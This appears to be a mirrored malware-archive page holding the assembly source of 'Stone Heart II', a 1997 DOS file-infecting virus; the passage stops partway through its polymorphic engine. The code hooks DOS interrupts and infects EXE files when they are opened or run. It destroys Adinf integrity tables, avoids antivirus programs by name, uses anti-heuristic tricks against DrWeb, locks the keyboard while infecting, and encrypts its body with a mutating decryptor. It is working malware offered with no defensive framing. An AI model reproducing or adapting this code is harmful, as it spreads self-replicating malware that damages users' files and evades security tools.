mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
1014 lines
26 KiB
NASM
1014 lines
26 KiB
NASM
|
|
|||
|
; <20><> <20>
|
|||
|
; <20><><EFBFBD> Virus Magazine <20> Box 176, Kiev 210, Ukraine IV 1997
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20> <20> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20> <20> <20> <20>
|
|||
|
; <20> <20> <20> <20><> <20><> <20> <20> <20><> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20>
|
|||
|
; <20> <20> <20> <20> <20><><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20> <20> <20>
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; (C) Copyright, 1994-97, by STEALTH group WorldWide, unLtd.
|
|||
|
|
|||
|
; Stone Heart II
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>६<EFBFBD><E0A5AC><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><>ࠦ<EFBFBD><E0A0A6>騩 EXE
|
|||
|
; 䠩<><E4A0A9> > 4096 <20><><EFBFBD><EFBFBD>.
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC> (512 <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>), <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; 祬<> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Adinf <20><><EFBFBD> TbClean.
|
|||
|
; <20><><EFBFBD><EFBFBD>ন<EFBFBD> <20><><EFBFBD>쪮 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><>䥪⨢<E4A5AA><E2A8A2><EFBFBD> <20>ਥ<EFBFBD><E0A8A5><EFBFBD> <20><><EFBFBD>⨢ <20><><EFBFBD><EFBFBD><EFBFBD>⨪<EFBFBD>
|
|||
|
; (<28><> <20><><EFBFBD><EFBFBD><EFBFBD>㦨<EFBFBD><E3A6A8><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DrWeb, F-Prot, AVP <20> <20>.<2E>.). Tbav <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>㣠<EFBFBD><E3A3A0><EFBFBD><EFBFBD>,
|
|||
|
; <20><> ।<><E0A5A4> <20> <20><> ᨫ쭮 (<28><><EFBFBD><EFBFBD>-<2D><><EFBFBD> 䫠<><E4ABA0>).
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> ⠡<><E2A0A1><EFBFBD><EFBFBD> Adinf <20><> <20><><EFBFBD><EFBFBD> ࠧ<><E0A0A7><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> 5 <20><>. <20>ᯥ譮 ࠡ<>⠥<EFBFBD> <20> DOS <20><><EFBFBD>ᨨ Windows
|
|||
|
; 95. <20><><EFBFBD>ࠥ<EFBFBD><E0A0A5><EFBFBD> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> <20><>⨢<EFBFBD><E2A8A2><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
;
|
|||
|
; (c) Eternal Maverick 1997
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
;-------------------------------------------------
|
|||
|
vl equ offset bytes - start
|
|||
|
base equ offset endv - start
|
|||
|
CrLen equ (vl+200h+1)/2
|
|||
|
;-------------------------------------------------
|
|||
|
start:
|
|||
|
;-------------------------------------------------
|
|||
|
; Very lame Anti-heuristic trick!
|
|||
|
; But it works against DrWeb...
|
|||
|
;-------------------------------------------------
|
|||
|
mov ah,62h
|
|||
|
int 21h
|
|||
|
mov ax,es
|
|||
|
cmp ax,bx
|
|||
|
je NoHer
|
|||
|
fuck_it:
|
|||
|
cld
|
|||
|
call mist
|
|||
|
mist:
|
|||
|
pop si
|
|||
|
add si,20h
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov cx,500h
|
|||
|
rep stosw
|
|||
|
jmp short fuck_it
|
|||
|
;-------------------------------------------------
|
|||
|
NoHer:
|
|||
|
push es
|
|||
|
no_es:
|
|||
|
call next
|
|||
|
next:
|
|||
|
mov ah,2Ah
|
|||
|
mov bx,'EM' ; Are you there ?
|
|||
|
int 21h
|
|||
|
install:
|
|||
|
cmp bx,'ME' ; You ask!
|
|||
|
je restore ; Already installed...
|
|||
|
|
|||
|
pop si
|
|||
|
push si
|
|||
|
sub si,offset next - start
|
|||
|
push es
|
|||
|
mov ax,word ptr ds:[02h]
|
|||
|
sub ax,(vl/16) + 1
|
|||
|
mov es,ax
|
|||
|
call remove
|
|||
|
pop ds
|
|||
|
mov si,0Ah
|
|||
|
mov di,offset fail - start + 1
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
mov word ptr ds:[si-4],offset INT22h - start
|
|||
|
mov word ptr ds:[si-2],es
|
|||
|
mov ds,cx
|
|||
|
mov si,084h
|
|||
|
mov di,offset old21h - start + 1
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
;------------------------------------
|
|||
|
; Adinf tables to kill!
|
|||
|
;------------------------------------
|
|||
|
; P.S. Adinf - a nasty bitch,
|
|||
|
; creating checksum tables
|
|||
|
; on every hard disk drive.
|
|||
|
;------------------------------------
|
|||
|
call DelTab
|
|||
|
mask1 db 'C:\*.*',0
|
|||
|
restore:
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
push dx
|
|||
|
add dx,10h
|
|||
|
push dx
|
|||
|
|
|||
|
add dx,20h
|
|||
|
sub dx,word ptr cs:[si+offset bytes - next + 08h]
|
|||
|
mov ax,word ptr cs:[si+offset CodeKey-next]
|
|||
|
mov ds,dx
|
|||
|
mov cx,100h
|
|||
|
xor di,di
|
|||
|
Decrypt:
|
|||
|
xor word ptr ds:[di],ax
|
|||
|
inc di
|
|||
|
inc di
|
|||
|
loop Decrypt
|
|||
|
|
|||
|
pop dx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov cx,word ptr ds:[si+offset bytes-next+06h]
|
|||
|
or cx,cx
|
|||
|
jz No_Relocation
|
|||
|
mov bx,word ptr ds:[si+offset bytes-next+18h]
|
|||
|
Next_Relo:
|
|||
|
les di,dword ptr ds:[si+bx+offset bytes-next]
|
|||
|
mov ax,es
|
|||
|
add ax,dx
|
|||
|
mov es,ax
|
|||
|
add word ptr es:[di],dx
|
|||
|
add bx,4
|
|||
|
loop Next_Relo
|
|||
|
No_Relocation:
|
|||
|
pop es
|
|||
|
mov cx,word ptr ds:[si+offset bytes-next]
|
|||
|
mov cx,dx
|
|||
|
cli
|
|||
|
add cx,word ptr ds:[si+offset bytes-next+0Eh]
|
|||
|
mov ss,cx
|
|||
|
mov sp,word ptr ds:[si+offset bytes-next+10h]
|
|||
|
sti
|
|||
|
add dx,word ptr ds:[si+offset bytes-next+16h]
|
|||
|
push dx
|
|||
|
push word ptr ds:[si+offset bytes-next+14h]
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
xor ax,ax
|
|||
|
xor bx,bx
|
|||
|
xor si,si
|
|||
|
xor di,di
|
|||
|
retf
|
|||
|
DelTab:
|
|||
|
pop di
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov ax,3524h
|
|||
|
int 21h
|
|||
|
push es bx
|
|||
|
lea dx,[di+offset int24h - mask1]
|
|||
|
mov ah,25h
|
|||
|
int 21h
|
|||
|
mov ah,2fh
|
|||
|
int 21h
|
|||
|
push es bx
|
|||
|
lea dx,[di+offset NewBytes - mask1]
|
|||
|
mov ah,1Ah
|
|||
|
int 21h
|
|||
|
mov byte ptr ds:[di],'C'
|
|||
|
mov dx,di
|
|||
|
NextDisk:
|
|||
|
push ds dx
|
|||
|
mov cx,07
|
|||
|
mov ah,4eh
|
|||
|
int 21h
|
|||
|
jc NotFound
|
|||
|
NextKill:
|
|||
|
mov ah,2fh
|
|||
|
int 21h
|
|||
|
pop di
|
|||
|
mov ax,word ptr ds:[di]
|
|||
|
push di
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov dl,byte ptr ds:[bx+1Eh+06]
|
|||
|
cmp dl,al
|
|||
|
jne NextFile
|
|||
|
mov word ptr ds:[bx+1bh],ax
|
|||
|
mov byte ptr ds:[bx+1dh],'\'
|
|||
|
lea dx,[bx+1bh]
|
|||
|
xor cx,cx
|
|||
|
mov ax,4301h
|
|||
|
int 21h
|
|||
|
mov cl,07
|
|||
|
mov ah,3ch
|
|||
|
int 21h
|
|||
|
NextFile:
|
|||
|
pop dx ds
|
|||
|
push ds dx
|
|||
|
mov ah,4fh
|
|||
|
int 21h
|
|||
|
jnc NextKill
|
|||
|
NotFound:
|
|||
|
pop dx ds
|
|||
|
mov di,dx
|
|||
|
inc byte ptr ds:[di]
|
|||
|
cmp al,12h
|
|||
|
je NextDisk
|
|||
|
pop dx ds
|
|||
|
mov ah,1ah
|
|||
|
int 21h
|
|||
|
pop dx ds
|
|||
|
mov ax,2524h
|
|||
|
int 21h
|
|||
|
jmp restore
|
|||
|
remove:
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov cx,vl/2
|
|||
|
xor di,di
|
|||
|
rep movsw
|
|||
|
ret
|
|||
|
set21h:
|
|||
|
cli
|
|||
|
mov si,084h
|
|||
|
mov word ptr ds:[si],offset int21h - start
|
|||
|
mov word ptr ds:[si+2],es
|
|||
|
sti
|
|||
|
ret
|
|||
|
int22h:
|
|||
|
mov ah,48h
|
|||
|
mov bx,(vl+400h + offset endcode - start)/16 + 1
|
|||
|
int 21h
|
|||
|
jc fail
|
|||
|
mov es,ax
|
|||
|
dec ax
|
|||
|
mov ds,ax
|
|||
|
xor si,si
|
|||
|
mov word ptr ds:[si+1],70h
|
|||
|
call remove
|
|||
|
mov ds,cx
|
|||
|
call set21h
|
|||
|
fail:
|
|||
|
db 0EAh,0,0,0,0
|
|||
|
int21h:
|
|||
|
cmp ah,4bh
|
|||
|
je check
|
|||
|
cmp ah,3dh
|
|||
|
je check
|
|||
|
cmp ah,43h
|
|||
|
je check
|
|||
|
;----------------------
|
|||
|
; Here I am, Boss!
|
|||
|
;----------------------
|
|||
|
cmp ah,2Ah
|
|||
|
jne old21h
|
|||
|
cmp bx,'EM'
|
|||
|
jne old21h
|
|||
|
xchg bh,bl
|
|||
|
iret
|
|||
|
;--------------------------------
|
|||
|
old21h: db 0EAh,0,0,0,0
|
|||
|
int24h:
|
|||
|
mov al,3
|
|||
|
iret
|
|||
|
check:
|
|||
|
;---------------------------------------
|
|||
|
; Check if it is a proper file
|
|||
|
; for infection
|
|||
|
;---------------------------------------
|
|||
|
push bp si di es bx cx ax dx ds
|
|||
|
|
|||
|
mov di,dx
|
|||
|
mov si,di
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
mov ax,1211h
|
|||
|
int 2Fh ; Converts ASCIIZ line into UpCase letters
|
|||
|
cld
|
|||
|
sub di,4
|
|||
|
mov ax,'XE'
|
|||
|
scasw
|
|||
|
jne abort
|
|||
|
scasb
|
|||
|
jne abort ; Not EXE...
|
|||
|
|
|||
|
cmp byte ptr es:[di-5],'F' ; Adin'F' - ?
|
|||
|
je abort ; Don't touch it.
|
|||
|
|
|||
|
sub di,12 ; 12 = Filename + '.' + Extention
|
|||
|
|
|||
|
;---------------------
|
|||
|
; Check if file name
|
|||
|
; contains digits
|
|||
|
;---------------------
|
|||
|
mov si,di
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov cx,8
|
|||
|
isDigit:
|
|||
|
lodsb
|
|||
|
cmp al,'0'
|
|||
|
jb noDigit
|
|||
|
cmp al,'9'
|
|||
|
jbe abort
|
|||
|
noDigit:
|
|||
|
loop isDigit
|
|||
|
;---------------------
|
|||
|
; Check for antivirus
|
|||
|
; names
|
|||
|
;---------------------
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov cl,6
|
|||
|
ChkThis:
|
|||
|
push cx
|
|||
|
mov si,offset antiv - start
|
|||
|
mov cl,6
|
|||
|
DoComp:
|
|||
|
cmpsw
|
|||
|
jne NextStr
|
|||
|
cmpsb
|
|||
|
je ExitComp
|
|||
|
dec si
|
|||
|
dec di
|
|||
|
NextStr:
|
|||
|
inc si
|
|||
|
dec di
|
|||
|
dec di
|
|||
|
loop DoComp
|
|||
|
|
|||
|
inc di
|
|||
|
pop cx
|
|||
|
loop ChkThis
|
|||
|
;---------------------
|
|||
|
ExitComp:
|
|||
|
or cx,cx
|
|||
|
jz Okey ; Good file
|
|||
|
|
|||
|
pop cx
|
|||
|
abort:
|
|||
|
jmp _esc
|
|||
|
Okey:
|
|||
|
;---------------------------------------
|
|||
|
; Save & set INT 24h
|
|||
|
;---------------------------------------
|
|||
|
mov ax,3524h
|
|||
|
call INT_21h
|
|||
|
|
|||
|
mov word ptr ds:[base],bx
|
|||
|
mov word ptr ds:[base+2],es
|
|||
|
|
|||
|
mov ax,2524h
|
|||
|
mov dx,offset int24h - start
|
|||
|
call INT_21h
|
|||
|
|
|||
|
;---------------------------------------
|
|||
|
; Turn keyboard off
|
|||
|
;---------------------------------------
|
|||
|
in al,21h
|
|||
|
or al,00000010b
|
|||
|
out 21h,AL
|
|||
|
;---------------------------------------
|
|||
|
pop ds dx
|
|||
|
push dx ds
|
|||
|
mov ax,4300h
|
|||
|
call INT_21h
|
|||
|
|
|||
|
push cx
|
|||
|
|
|||
|
test cl,00000100b ; System file - ?
|
|||
|
jnz protect ; Don't touch it!!!
|
|||
|
|
|||
|
;----------------------------------------
|
|||
|
; Checking for protected floppy
|
|||
|
; using 3F5h port
|
|||
|
;----------------------------------------
|
|||
|
push dx
|
|||
|
mov cx,400h
|
|||
|
mov dx,3F5h
|
|||
|
mov al,4
|
|||
|
out dx,al
|
|||
|
wait_1:
|
|||
|
loop wait_1
|
|||
|
|
|||
|
mov cx,400h
|
|||
|
out dx,al
|
|||
|
wait_2:
|
|||
|
loop wait_2
|
|||
|
|
|||
|
in al,dx
|
|||
|
test al,40h ; Protected disk - ?
|
|||
|
pop dx
|
|||
|
jnz protect
|
|||
|
;----------------------------------
|
|||
|
pop cx
|
|||
|
push cx
|
|||
|
and cl,0FEh ; Set READ-ONLY off
|
|||
|
mov ax,4301h
|
|||
|
call INT_21h
|
|||
|
jnc FileOk
|
|||
|
;-------------------------------
|
|||
|
; Not able to change attribute
|
|||
|
;-------------------------------
|
|||
|
protect:
|
|||
|
pop cx
|
|||
|
jmp esc_1
|
|||
|
FileOk:
|
|||
|
push dx ds
|
|||
|
mov ax,3D02h
|
|||
|
call INT_21h ; DOS Services ah=function 3Dh
|
|||
|
; open file, al=mode,name@ds:dx
|
|||
|
|
|||
|
mov word ptr cs:[base+06h],ax
|
|||
|
mov ax,5700h
|
|||
|
call FileX ; DOS Services ah=function 57h
|
|||
|
; get/set file date & time
|
|||
|
push dx cx
|
|||
|
cmp cl,0Fh ; Is it already infected?
|
|||
|
je esc2
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset Bytes - start
|
|||
|
mov cx,400h
|
|||
|
call ReadX ; DOS Services ah=function 3Fh
|
|||
|
; read file, cx=bytes, to ds:dx
|
|||
|
call SeekE
|
|||
|
|
|||
|
cmp ax,1000h ; File too small to be infected - ?
|
|||
|
jb esc2
|
|||
|
|
|||
|
mov si,offset Bytes - start
|
|||
|
cmp word ptr ds:[si],'MZ'
|
|||
|
je ExeOk
|
|||
|
cmp word ptr ds:[si],'ZM'
|
|||
|
jne esc2
|
|||
|
ExeOk:
|
|||
|
;---------------------------------------
|
|||
|
; Is header longer than 512 bytes ?
|
|||
|
;---------------------------------------
|
|||
|
cmp word ptr ds:[si+8],20h
|
|||
|
ja esc2
|
|||
|
;---------------------------------------
|
|||
|
; Is this EXE segmented ?
|
|||
|
;---------------------------------------
|
|||
|
push dx ax
|
|||
|
mov di,200h
|
|||
|
div di
|
|||
|
dec ax
|
|||
|
cmp ax,word ptr ds:[si+04h]
|
|||
|
pop ax dx
|
|||
|
jbe Not_Segmented
|
|||
|
esc2:
|
|||
|
jmp esc_2
|
|||
|
;----------------------------------------
|
|||
|
Not_Segmented:
|
|||
|
mov di,offset NewBytes - start
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
mov cx,0Ch
|
|||
|
rep movsw
|
|||
|
|
|||
|
mov cx,10h
|
|||
|
div cx
|
|||
|
|
|||
|
sub ax,word ptr ds:[si+1024-18h+08h]
|
|||
|
mov word ptr ds:[si+1024-18h+16h],ax ; ReloCS
|
|||
|
mov word ptr ds:[si+1024-18h+14h],dx ; ExeIP
|
|||
|
mov word ptr ds:[offset SaveOff - Start],dx
|
|||
|
;----------------------------------------
|
|||
|
; Reseting STACK
|
|||
|
;----------------------------------------
|
|||
|
add ax,(vl+200h)/16+1
|
|||
|
mov word ptr ds:[si+1024-18h+0Eh],ax ; ReloSS
|
|||
|
add dx,400h
|
|||
|
and dl,not 1 ; To avoid an odd stack
|
|||
|
mov word ptr ds:[si+1024-18h+10h],dx ; ReloSP
|
|||
|
;----------------------------------------
|
|||
|
again:
|
|||
|
in ax,40h
|
|||
|
or ax,ax
|
|||
|
jz again
|
|||
|
|
|||
|
mov word ptr ds:[offset CodeKey - start],ax
|
|||
|
mov di,offset Bytes - start + 200h
|
|||
|
push di
|
|||
|
mov cx,100h
|
|||
|
Encrypt:
|
|||
|
xor word ptr ds:[di],ax
|
|||
|
inc di
|
|||
|
inc di
|
|||
|
loop Encrypt
|
|||
|
|
|||
|
push si
|
|||
|
xor si,si
|
|||
|
mov di,cs
|
|||
|
add di,(offset buffer - start)/16 + 1
|
|||
|
mov es,di
|
|||
|
call emme11
|
|||
|
|
|||
|
pop si
|
|||
|
push di
|
|||
|
xor dx,dx
|
|||
|
mov ax,word ptr ds:[si+1024-18h+02h]
|
|||
|
add ax,di
|
|||
|
mov di,200h
|
|||
|
div di
|
|||
|
add word ptr ds:[si+1024-18h+04h],ax ; FileSize in 512-byte blocks
|
|||
|
mov word ptr ds:[si+1024-18h+02h],dx ; Rest of bytes
|
|||
|
mov word ptr ds:[si+1024-18h+06h],0 ; Set number of relocation
|
|||
|
; table elements to 0
|
|||
|
|
|||
|
pop cx
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
xor dx,dx
|
|||
|
call WriteX ; Write virus body
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
call SeekH
|
|||
|
mov dx,offset NewBytes - start
|
|||
|
call WriteH ; Write first 18h bytes (header)
|
|||
|
xor al,al
|
|||
|
mov dx,200h
|
|||
|
call SeekY
|
|||
|
mov cx,200h
|
|||
|
pop dx
|
|||
|
call WriteX
|
|||
|
Marker:
|
|||
|
pop cx
|
|||
|
mov cl,0Fh ; Set time to mark infection
|
|||
|
push cx
|
|||
|
esc_2:
|
|||
|
pop cx dx
|
|||
|
mov ax,5701h
|
|||
|
call FileX ; DOS Services ah=function 57h
|
|||
|
; get/set file date & time
|
|||
|
mov ah,3Eh
|
|||
|
call FileX ; DOS Services ah=function 3Eh
|
|||
|
; close file, bx=file handle
|
|||
|
pop ds dx cx
|
|||
|
mov ax,4301h
|
|||
|
call INT_21h ; DOS Services ah=function 43h
|
|||
|
; get/set file attrb, nam@ds:dx
|
|||
|
esc_1:
|
|||
|
;-----------------------------
|
|||
|
; Restore int 24h
|
|||
|
;-----------------------------
|
|||
|
lds dx,dword ptr cs:[base]
|
|||
|
mov ax,2524h
|
|||
|
call INT_21h
|
|||
|
;-----------------------------
|
|||
|
; Enable IRQ-1
|
|||
|
; User can play with keyboard
|
|||
|
; again.
|
|||
|
;-----------------------------
|
|||
|
in al,21h
|
|||
|
and al,not 2
|
|||
|
out 21h,al
|
|||
|
;-----------------------------
|
|||
|
_ESC:
|
|||
|
pop ds dx ax cx bx es di si bp
|
|||
|
jmp old21h ; No other actions.
|
|||
|
|
|||
|
db 'StoneHeart II' ; Virus name
|
|||
|
|
|||
|
ReadX:
|
|||
|
mov ah,3Fh
|
|||
|
jmp short FileX
|
|||
|
WriteH:
|
|||
|
mov cx,18h
|
|||
|
WriteX:
|
|||
|
mov ah,40h
|
|||
|
jmp short FileX
|
|||
|
SeekH:
|
|||
|
xor al,al
|
|||
|
jmp short SeekX
|
|||
|
SeekE:
|
|||
|
mov al,02
|
|||
|
SeekX:
|
|||
|
xor dx,dx
|
|||
|
SeekY:
|
|||
|
xor cx,cx
|
|||
|
SeekZ:
|
|||
|
mov ah,42h
|
|||
|
FileX:
|
|||
|
mov bx,word ptr cs:[base+06h] ; File Handle is stored there...
|
|||
|
INT_21h:
|
|||
|
pushf
|
|||
|
call dword ptr cs:[offset old21h - start+1]
|
|||
|
ret
|
|||
|
CodeKey:
|
|||
|
dw 0 ; This word is used to crypt
|
|||
|
; a part of file
|
|||
|
;-----------------------------------------------------------------
|
|||
|
; These shity programs are too stinky to be even infected
|
|||
|
;-----------------------------------------------------------------
|
|||
|
ANTIV db 'AID','AVP','PRO','SCA','EXT','WEB'
|
|||
|
;-----------------------------------------------------------------
|
|||
|
; Polymorphic Engine of Stone Heart II
|
|||
|
;-----------------------------------------------------------------
|
|||
|
Emme11:
|
|||
|
call modulof
|
|||
|
modulof:
|
|||
|
pop bp
|
|||
|
sub bp,3
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; PARAMETERS:
|
|||
|
; ES - points to buffer of proper size.
|
|||
|
; DS - points to segment of code to be encrypted.
|
|||
|
; SI - offset of code to be crypted.
|
|||
|
; CrLen - number of words (NOT BYTES!!!) to be crypted.
|
|||
|
; SaveOff - delta offset in file (Length + 100h for appending
|
|||
|
; COM infector, for example)
|
|||
|
;
|
|||
|
; When finished:
|
|||
|
; <20>S:0 - crypted code.
|
|||
|
; DI - its size in bytes.
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
; A structure of encryptor:
|
|||
|
; -------------------------
|
|||
|
;
|
|||
|
; mov reg1,offcode ; offcode - offset of crypted code
|
|||
|
; mov reg2,-CrLen
|
|||
|
; mov reg3,code_1
|
|||
|
;Decode:
|
|||
|
; oper1 word ptr ds:[reg1],reg3
|
|||
|
; inc reg1
|
|||
|
; inc reg1
|
|||
|
; oper2 reg3,code_2
|
|||
|
; inc reg2
|
|||
|
; jnz Decode
|
|||
|
;
|
|||
|
; --------------------------------
|
|||
|
;
|
|||
|
; reg1 - SI,DI,BX or BP
|
|||
|
; reg2,reg3 - AX,BX,CX,DX,BP,SI or DI
|
|||
|
; oper1 - XOR,ADD or SUB
|
|||
|
; oper2 - ADD or SUB
|
|||
|
;
|
|||
|
; code_1,code_2 - random numbers
|
|||
|
;
|
|||
|
; All unused in decryptor registers are used in garbage instructions.
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
PolyStart:
|
|||
|
in al,40h
|
|||
|
or al,al
|
|||
|
jz PolyStart
|
|||
|
|
|||
|
push si
|
|||
|
|
|||
|
xor di,di
|
|||
|
|
|||
|
call makeini
|
|||
|
|
|||
|
inc byte ptr [bp+offset Reg - Emme11]
|
|||
|
|
|||
|
lea si,[bp+offset anti-Emme11]
|
|||
|
mov cx,05h
|
|||
|
ANTI_HER:
|
|||
|
cmp cl,2
|
|||
|
jne noGlue
|
|||
|
mov al,75h
|
|||
|
stosb
|
|||
|
push di
|
|||
|
inc di
|
|||
|
noGlue:
|
|||
|
call make
|
|||
|
movsw
|
|||
|
loop anti_her
|
|||
|
|
|||
|
pop bx
|
|||
|
mov ax,di
|
|||
|
sub ax,bx
|
|||
|
dec ax
|
|||
|
dec ax
|
|||
|
dec ax
|
|||
|
mov byte ptr es:[bx],al
|
|||
|
|
|||
|
;---------------------------------------------
|
|||
|
; Creating a decryptor
|
|||
|
;---------------------------------------------
|
|||
|
|
|||
|
call makeini
|
|||
|
|
|||
|
;---------------------------------------------
|
|||
|
; First instruction
|
|||
|
;---------------------------------------------
|
|||
|
instr1:
|
|||
|
call ZeroTwo
|
|||
|
|
|||
|
mov al,byte ptr ds:[bx+offset Pack_1-Emme11]
|
|||
|
stosb
|
|||
|
push di ; Needed for decryptor
|
|||
|
stosw ; To reserve a place for offset
|
|||
|
mov al,byte ptr ds:[bx+3+offset Pack_1-Emme11]
|
|||
|
mov byte ptr ds:[si+1],al
|
|||
|
mov al,byte ptr ds:[bx+6+offset Pack_1-Emme11]
|
|||
|
mov ah,al
|
|||
|
mov word ptr ds:[si+2],ax
|
|||
|
sub al,40h
|
|||
|
mov bl,al
|
|||
|
call _fill ; Make a register busy
|
|||
|
call make
|
|||
|
;-----------------------------------------------
|
|||
|
; Second instruction
|
|||
|
;-----------------------------------------------
|
|||
|
instr2:
|
|||
|
call f_reg
|
|||
|
in ax,40h
|
|||
|
and ax,0Fh
|
|||
|
add ax,CrLen
|
|||
|
add bl,48h
|
|||
|
mov byte ptr ds:[si+7],bl
|
|||
|
|
|||
|
stosw
|
|||
|
|
|||
|
call make
|
|||
|
;------------------------------------------------
|
|||
|
; Third instruction
|
|||
|
;------------------------------------------------
|
|||
|
instr3:
|
|||
|
call f_reg
|
|||
|
|
|||
|
mov byte ptr ds:[si+5],bl
|
|||
|
|
|||
|
mov al,8
|
|||
|
mul bl
|
|||
|
add byte ptr ds:[si+1],al
|
|||
|
in ax,40h
|
|||
|
add ax,di
|
|||
|
stosw
|
|||
|
push di
|
|||
|
mov word ptr ds:[bp+offset encryptor - Emme11 - 3],ax
|
|||
|
call make
|
|||
|
;--------------------------------------------------
|
|||
|
; To choose operations
|
|||
|
;--------------------------------------------------
|
|||
|
call ZeroTwo
|
|||
|
|
|||
|
mov al,byte ptr ds:[offset mirror1 - Emme11 + bx]
|
|||
|
mov byte ptr ds:[si],al
|
|||
|
sub bx,bp
|
|||
|
neg bx
|
|||
|
add bx,bp
|
|||
|
mov al,byte ptr ds:[offset mirror1 - Emme11 + bx + 2]
|
|||
|
mov byte ptr ds:[bp+offset encryptor-Emme11+2],al
|
|||
|
|
|||
|
call rnd
|
|||
|
|
|||
|
and bl,1
|
|||
|
add bx,bp
|
|||
|
mov al,byte ptr ds:[offset mirror2 - Emme11 + bx]
|
|||
|
add byte ptr ds:[si+5],al
|
|||
|
add al,3
|
|||
|
mov byte ptr ds:[bp+offset encryptor-Emme11+6],al
|
|||
|
|
|||
|
;-----------------------------------------------------
|
|||
|
; To copy rest of decryptor
|
|||
|
;-----------------------------------------------------
|
|||
|
movsw
|
|||
|
call make
|
|||
|
movsb
|
|||
|
call make
|
|||
|
movsb
|
|||
|
call make
|
|||
|
movsw
|
|||
|
in al,40h
|
|||
|
mov byte ptr ds:[bp+offset encryptor - Emme11 + 7],al
|
|||
|
stosb
|
|||
|
inc si
|
|||
|
call make
|
|||
|
movsw
|
|||
|
mov ax,0FFh
|
|||
|
sub ax,di
|
|||
|
pop bx
|
|||
|
add ax,bx ; BYTE for JNZ instruction
|
|||
|
stosb
|
|||
|
call make
|
|||
|
|
|||
|
pop si
|
|||
|
mov ax,word ptr ds:[SaveOff]
|
|||
|
add ax,di
|
|||
|
mov word ptr es:[si],ax ; Offset of crypted code
|
|||
